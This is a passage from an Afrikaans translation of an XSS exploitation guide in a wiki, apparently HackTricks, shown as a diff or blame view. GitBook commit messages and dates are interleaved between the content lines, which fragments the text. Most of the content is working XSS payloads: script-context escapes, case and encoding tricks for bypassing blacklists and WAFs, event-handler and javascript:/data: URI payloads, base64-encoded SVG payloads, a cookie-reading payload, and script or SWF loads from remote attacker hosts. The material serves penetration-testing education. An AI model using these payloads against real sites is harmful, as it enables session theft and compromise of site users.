+								* As dit weerspieël word tussen **`<script> [...] </script>`** etikette, selfs as jou inset binne enige soort aanhalingstekens is, kan jy probeer om `</script>` in te spuit en te ontsnap uit hierdie konteks. Dit werk omdat die **blaaier eers die HTML-etikette sal ontledig** en dan die inhoud, daarom sal dit nie agterkom dat jou ingespotte `</script>` etiket binne die HTML-kode is nie.
 								* As dit weerspieël word **binne 'n JS-string** en die vorige truuk nie werk nie, sal jy die string moet **verlaat**, jou kode **uitvoer** en die JS-kode **herkonstrueer** (as daar enige fout is, sal dit nie uitgevoer word nie):
 								  * `'-alert(1)-'`
 								  * `';-alert(1)//`
 								  * `\';alert(1)//`
 								* As dit binne sjabloonliterale weerspieël word, kan jy **JS-uitdrukkings** inbed met behulp van `${ ... }` sintaksis: `` var greetings = `Hello, ${alert(1)}` ``
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								* **Unicode-kodering** werk om **geldige javascript-kode** te skryf:
-												GITBOOK-3770: No subject

											
										
										
											2023-02-07 10:56:16 +00:00
+								```javascript
 								\u{61}lert(1)
 								\u0061lert(1)
 								\u{0061}lert(1)
 								```
-												GitBook: [#3278] No subject

											
										
										
											2022-06-24 08:34:11 +00:00
+								#### Javascript Hoisting
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								Javascript Hoisting verwys na die geleentheid om **funksies, veranderlikes of klasse te verklaar nadat hulle gebruik is sodat jy scenarios kan misbruik waar 'n XSS onverklaarde veranderlikes of funksies gebruik.**\
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								**Kyk na die volgende bladsy vir meer inligting:**
-												GitBook: [#3278] No subject

											
										
										
											2022-06-24 08:34:11 +00:00
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
+								{% content-ref url="js-hoisting.md" %}
 								[js-hoisting.md](js-hoisting.md)
 								{% endcontent-ref %}
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### Javascript Funksie
-												GitBook: [#3276] No subject

											
										
										
											2022-06-23 12:12:25 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:45:55 +00:00
+								Verskeie webbladsye het eindpunte wat **die naam van die funksie aanvaar as parameter om uit te voer**. 'n Algemene voorbeeld wat in die wild gesien word, is iets soos: `?callback=callbackFunc`.
-												GitBook: [#3276] No subject

											
										
										
											2022-06-23 12:12:25 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								'N Goeie manier om uit te vind of iets wat direk deur die gebruiker gegee word, probeer uitgevoer word, is om **die paramwaarde te wysig** (byvoorbeeld na 'Vulnerable') en in die konsole te kyk vir foute soos:
-												GitBook: [#3276] No subject

											
										
										
											2022-06-23 12:12:25 +00:00
-												GitBook: [#3285] No subject

											
										
										
											2022-06-27 08:48:17 +00:00
+								![](<../../.gitbook/assets/image (651) (2).png>)
-												GitBook: [#3276] No subject

											
										
										
											2022-06-23 12:12:25 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								Indien dit vatbaar is, kan jy dalk 'n **waarskuwing aktiveer** deur net die waarde te stuur: **`?callback=alert(1)`**. Dit is egter baie algemeen dat hierdie eindpunte die inhoud **valideer** om slegs letters, syfers, kolletjies en onderstrepe toe te laat (**`[\w\._]`**).
-												GitBook: [#3276] No subject

											
										
										
											2022-06-23 12:12:25 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Nietemin is dit steeds moontlik om sekere aksies uit te voer selfs met daardie beperking. Dit is omdat jy daardie geldige karakters kan gebruik om enige element in die DOM **te benader**:
-												GitBook: [#3276] No subject

											
										
										
											2022-06-23 12:12:25 +00:00
 								![](<../../.gitbook/assets/image (662).png>)
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								Sommige nuttige funksies hiervoor:
-												GitBook: [#3276] No subject

											
										
										
											2022-06-23 12:12:25 +00:00
+								```
 								firstElementChild
 								lastElementChild
 								nextElementSibiling
 								lastElementSibiling
 								parentElement
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Jy kan ook probeer om **Javascript funksies direk te trigger**: `obj.sales.delOrders`.
-												GitBook: [#3276] No subject

											
										
										
											2022-06-23 12:12:25 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								Gewoonlik is die eindpunte wat die aangeduide funksie uitvoer eindpunte sonder baie interessante DOM, **ander bladsye in dieselfde oorsprong** sal 'n **meer interessante DOM** hê om meer aksies uit te voer.
-												GitBook: [#3276] No subject

											
										
										
											2022-06-23 12:12:25 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								Daarom is die **Selfde Oorsprong Metode Uitvoering (SOME)** uitbuiting ontwikkel om hierdie kwesbaarheid in 'n ander DOM te **misbruik**:
-												GitBook: [#3276] No subject

											
										
										
											2022-06-23 12:12:25 +00:00
 								{% content-ref url="some-same-origin-method-execution.md" %}
 								[some-same-origin-method-execution.md](some-same-origin-method-execution.md)
 								{% endcontent-ref %}
-												GitBook: [#3167] No subject

											
										
										
											2022-05-01 16:57:45 +00:00
+								### DOM
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Daar is **JS-kode** wat **onveilig** van 'n aanvaller beheerde data gebruik soos `location.href`. 'n Aanvaller kan dit misbruik om arbitrêre JS-kode uit te voer.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								{% content-ref url="dom-xss.md" %}
 								[dom-xss.md](dom-xss.md)
 								{% endcontent-ref %}
-												GitBook: [master] 472 pages modified
											
										
										
											2021-05-27 11:59:23 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								### **Universale XSS**
-												GitBook: [master] 472 pages modified
											
										
										
											2021-05-27 11:59:23 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Hierdie soort XSS kan **oral** gevind word. Dit hang nie net af van die kliënt-uitbuiting van 'n webtoepassing nie, maar van **enige** **konteks**. Hierdie soort **arbitrêre JavaScript-uitvoering** kan selfs misbruik word om **RCE** te verkry, **arbitrêre lêers te lees** op kliënte en bedieners, en meer.\
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								Sommige **voorbeelde**:
-												GitBook: [master] 472 pages modified
											
										
										
											2021-05-27 11:59:23 +00:00
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								{% content-ref url="server-side-xss-dynamic-pdf.md" %}
 								[server-side-xss-dynamic-pdf.md](server-side-xss-dynamic-pdf.md)
 								{% endcontent-ref %}
-												GitBook: [master] 472 pages modified
											
										
										
											2021-05-27 11:59:23 +00:00
-												GITBOOK-4142: change request with no subject merged in GitBook

											
										
										
											2023-10-27 16:04:24 +00:00
+								{% content-ref url="../../network-services-pentesting/pentesting-web/electron-desktop-apps/" %}
 								[electron-desktop-apps](../../network-services-pentesting/pentesting-web/electron-desktop-apps/)
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								{% endcontent-ref %}
-												GitBook: [master] 472 pages modified
											
										
										
											2021-05-27 11:59:23 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								## WAF omseil enkodering van afbeelding
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								![van https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/eaubb2ex0aerank.jpg)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								## Insit in rou HTML
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Wanneer jou inset **binne die HTML-bladsy** gereflekteer word of jy HTML-kode kan ontsnap en insit in hierdie konteks, is die **eerste** ding wat jy moet doen, om te kyk of jy `<` kan misbruik om nuwe etikette te skep: Probeer net daardie **karakter** weerspieël en kyk of dit **HTML-geënkodeer** word of **verwyder** word of as dit sonder veranderinge **weerspieël** word. **Slegs in die laaste geval sal jy hierdie geval kan uitbuit**.\
 								Vir hierdie gevalle moet jy ook in gedagte hou [**Kliëntkant Sjablooninspuiting**](../client-side-template-injection-csti.md)**.**\
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								_**Nota: 'n HTML-kommentaar kan gesluit word met**** ****`-->`**** ****of**** ****`--!>`**_
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								In hierdie geval, en as geen swartlys/witlys gebruik word nie, kan jy ladingstukke soos gebruik:
-												a

											
										
										
											2024-02-06 03:10:27 +00:00
+								```html
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								<script>alert(1)</script>
 								<img src=x onerror=alert(1) />
 								<svg onload=alert('XSS')>
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Maar, as tags/kenmerke swart/witlys gebruik word, sal jy nodig hê om **brute-force watter tags** jy kan skep.\
 								Sodra jy **gevind het watter tags toegelaat is**, sal jy nodig hê om **brute-force kenmerke/gebeurtenisse** binne die gevonde geldige tags te sien om uit te vind hoe jy die konteks kan aanval.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								### Tags/Gebeurtenisse brute-force
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Gaan na [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) en klik op _**Kopieer tags na knipbord**_. Stuur dan almal met Burp intruder en kontroleer of enige tags nie as skadelik deur die WAF ontdek is nie. Sodra jy ontdek het watter tags jy kan gebruik, kan jy **brute force al die gebeurtenisse** gebruik deur die geldige tags (op dieselfde webbladsy klik op _**Kopieer gebeurtenisse na knipbord**_ en volg dieselfde prosedure as voorheen).
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### Aangepaste tags
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								As jy geen geldige HTML-tag gevind het nie, kan jy probeer om **'n aangepaste tag te skep** en JS-kode uit te voer met die `onfocus` kenmerk. In die XSS-versoek, moet jy die URL eindig met `#` om die bladsy **te fokus op daardie objek** en die kode **uit te voer**:
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								/?search=<xss+id%3dx+onfocus%3dalert(document.cookie)+tabindex%3d1>#x
 								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### Swartlys Verbygaan
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								Indien 'n soort swartlys gebruik word, kan jy probeer om dit te verbygaan met 'n paar dom truuks:
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```javascript
 								//Random capitalization
 								<script> --> <ScrIpT>
 								<img --> <ImG
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								//Double tag, in case just the first match is removed
 								<script><script>
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
+								<scr<script>ipt>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								<SCRscriptIPT>alert(1)</SCRscriptIPT>
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								//You can substitude the space to separate attributes for:
 								/
 								/*%00/
 								/%00*/
 								%2F
 								%0D
 								%0C
 								%0A
 								%09
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								//Unexpected parent tags
 								<svg><x><script>alert('1'&#41</x>
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								//Unexpected weird attributes
 								<script x>
 								<script a="1234">
 								<script ~~~>
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
+								<script/random>alert(1)</script>
 								<script      ///Note the newline
 								>alert(1)</script>
 								<scr\x00ipt>alert(1)</scr\x00ipt>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								//Not closing tag, ending with " <" or " //"
 								<iframe SRC="javascript:alert('XSS');" <
 								<iframe SRC="javascript:alert('XSS');" //
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								//Extra open
 								<<script>alert("XSS");//<</script>
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								//Just weird an unexpected, use your imagination
 								<</script/script><script>
 								<input type=image src onerror="prompt(1)">
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								//Using `` instead of parenthesis
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
+								onerror=alert`1`
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								//Use more than one
 								<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								### Lengte oorskryding (klein XSSs)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3020] No subject

											
										
										
											2022-02-18 15:49:34 +00:00
+								{% hint style="info" %}
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								**Meer klein XSS vir verskillende omgewings** lading [**kan hier gevind word**](https://github.com/terjanq/Tiny-XSS-Payloads) en [**hier**](https://tinyxss.terjanq.me).
-												GitBook: [#3020] No subject

											
										
										
											2022-02-18 15:49:34 +00:00
+								{% endhint %}
 								```html
 								<!-- Taken from the blog of Jorge Lajara -->
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								<svg/onload=alert``>
 								<script src=//aa.es>
 								<script src=//℡㏛.pw>
 								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								Die laaste een maak gebruik van 2 Unicode karakters wat uitbrei na 5: telsr\
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								Meer van hierdie karakters kan gevind word [hier](https://www.unicode.org/charts/normalization/).\
 								Om te kontroleer watter karakters ontbind is, kyk [hier](https://www.compart.com/en/unicode/U+2121).
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								### Kliek XSS - Clickjacking
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:45:55 +00:00
+								Indien jy die kwesbaarheid wil uitbuit deur die **gebruiker te laat kliek op 'n skakel of 'n vorm** met vooraf ingevulde data, kan jy probeer om [**Clickjacking te misbruik**](../clickjacking.md#xss-clickjacking) (as die bladsy kwesbaar is).
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								### Onmoontlik - Hangende Opmaak
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Indien jy net dink dat **dit onmoontlik is om 'n HTML-tag met 'n eienskap te skep om JS-kode uit te voer**, moet jy [**Hangende Opmaak**](../dangling-markup-html-scriptless-injection/) nagaan omdat jy die kwesbaarheid kan **uitbuit** sonder om **JS**-kode uit te voer.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								## Inspruiting binne HTML-tag
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								### Binne die tag/ontsnapping vanaf attribuutwaarde
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Indien jy **binne 'n HTML-tag** is, kan jy eerste probeer om te **ontsnap** van die tag en van die tegnieke wat genoem word in die [vorige afdeling](./#injecting-inside-raw-html) gebruik maak om JS-kode uit te voer.\
 								Indien jy **nie kan ontsnap van die tag nie**, kan jy nuwe eienskappe binne die tag skep om te probeer om JS-kode uit te voer, byvoorbeeld deur 'n payload te gebruik (_let daarop dat in hierdie voorbeeld dubbele aanhalingstekens gebruik word om te ontsnap van die eienskap, jy sal hulle nie nodig hê as jou inset direk binne die tag weerspieël word_):
-												GitBook: [#3070] No subject

											
										
										
											2022-03-21 17:05:35 +00:00
+								```bash
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								" autofocus onfocus=alert(document.domain) x="
-												GitBook: [#3070] No subject

											
										
										
											2022-03-21 17:05:35 +00:00
+								" onfocus=alert(1) id=x tabindex=0 style=display:block>#x #Access http://site.com/?#x t
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								**Stylgebeure**
-												GitBook: [master] one page modified
											
										
										
											2021-02-25 11:06:26 +00:00
+								```python
 								<p style="animation: x;" onanimationstart="alert()">XSS</p>
 								<p style="animation: x;" onanimationend="alert()">XSS</p>
 								#ayload that injects an invisible overlay that will trigger a payload if anywhere on the page is clicked:
 								<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick="alert(1)"></div>
 								#moving your mouse anywhere over the page (0-click-ish):
 								<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover="alert(1)"></div>
 								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								### Binne die attribuut
-												GitBook: [master] one page modified
											
										
										
											2021-02-25 11:06:26 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Selfs as jy **nie kan ontsnap van die attribuut nie** (`"` word gekodeer of verwyder), afhangende van **watter attribuut** jou waarde weerspieël as jy al die waarde beheer of net 'n deel daarvan, sal jy dit kan misbruik. By **voorbeeld**, as jy 'n gebeurtenis soos `onclick=` beheer, sal jy dit kan maak om willekeurige kode uit te voer wanneer dit geklik word.\
 								'n Ander interessante **voorbeeld** is die attribuut `href`, waar jy die `javascript:` protokol kan gebruik om willekeurige kode uit te voer: **`href="javascript:alert(1)"`**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								**Deurdring binne gebeurtenis deur HTML-kodering/URL-kodering**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Die **HTML-gekodeerde karakters** binne die waarde van HTML-etiketatribute word tydens uitvoering **gedekodeer**. Daarom sal iets soos die volgende geldig wees (die lading is vetgedruk): `<a id="author" href="http://none" onclick="var tracker='http://foo?`**`&apos;-alert(1)-&apos;`**`';">Go Back </a>`
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								Merk op dat **enige soort HTML-kodering geldig is**:
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```javascript
 								//HTML entities
 								&apos;-alert(1)-&apos;
 								//HTML hex without zeros
 								&#x27-alert(1)-&#x27
 								//HTML hex with zeros
 								&#x00027-alert(1)-&#x00027
 								//HTML dec without zeros
 								&#39-alert(1)-&#39
 								//HTML dec with zeros
 								&#00039-alert(1)-&#00039
-												GITBOOK-3804: No subject

											
										
										
											2023-03-03 17:26:17 +00:00
+								<a href="javascript:var a='&apos;-alert(1)-&apos;'">a</a>
 								<a href="&#106;avascript:alert(2)">a</a>
 								<a href="jav&#x61script:alert(3)">a</a>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:45:55 +00:00
+								**Let wel dat URL-kodering ook sal werk:**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```python
 								<a href="https://example.com/lol%22onmouseover=%22prompt(1);%20img.png">Click</a>
 								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								**Deur Unicode-kodering binne 'n gebeurtenis te omseil**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```javascript
 								//For some reason you can use unicode to encode "alert" but not "(1)"
 								<img src onerror=\u0061\u006C\u0065\u0072\u0074(1) />
 								<img src onerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />
 								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								### Spesiale Protokolle binne die attribuut
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								Daar kan jy die protokolle **`javascript:`** of **`data:`** op sommige plekke gebruik om **arbitrêre JS-kode uit te voer**. Sommige sal gebruikerinteraksie vereis en ander nie.
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
+								```javascript
 								javascript:alert(1)
 								JavaSCript:alert(1)
 								javascript:%61%6c%65%72%74%28%31%29 //URL encode
 								javascript&colon;alert(1)
 								javascript&#x003A;alert(1)
 								javascript&#58;alert(1)
 								&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3aalert(1)
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								java        //Note the new line
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
+								script:alert(1)
 								data:text/html,<script>alert(1)</script>
 								DaTa:text/html,<script>alert(1)</script>
 								data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
 								data:text/html;charset=UTF-8,<script>alert(1)</script>
 								data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
 								data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg
 								data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==
 								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								**Plekke waar jy hierdie protokolle kan inspuit**
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								**In die algemeen** kan die `javascript:` protokol **gebruik word in enige tag wat die attribuut `href` aanvaar** en in **die meeste** van die tags wat die **attribuut `src`** aanvaar (maar nie `<img`)
-												GitBook: [master] 2 pages modified
											
										
										
											2021-07-17 21:10:13 +00:00
+								```markup
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
+								<a href="javascript:alert(1)">
 								<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
 								<form action="javascript:alert(1)"><button>send</button></form>
 								<form id=x></form><button form="x" formaction="javascript:alert(1)">send</button>
 								<object data=javascript:alert(3)>
 								<iframe src=javascript:alert(2)>
 								<embed src=javascript:alert(1)>
 								<object data="data:text/html,<script>alert(5)</script>">
 								<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>
 								<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>
 								<iframe src="data:text/html,<script>alert(5)</script>"></iframe>
 								//Special cases
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								<object data="//hacker.site/xss.swf"> .//https://github.com/evilcos/xss.swf
 								<embed code="//hacker.site/xss.swf" allowscriptaccess=always> //https://github.com/evilcos/xss.swf
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
+								<iframe srcdoc="<svg onload=alert(4);>">
 								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
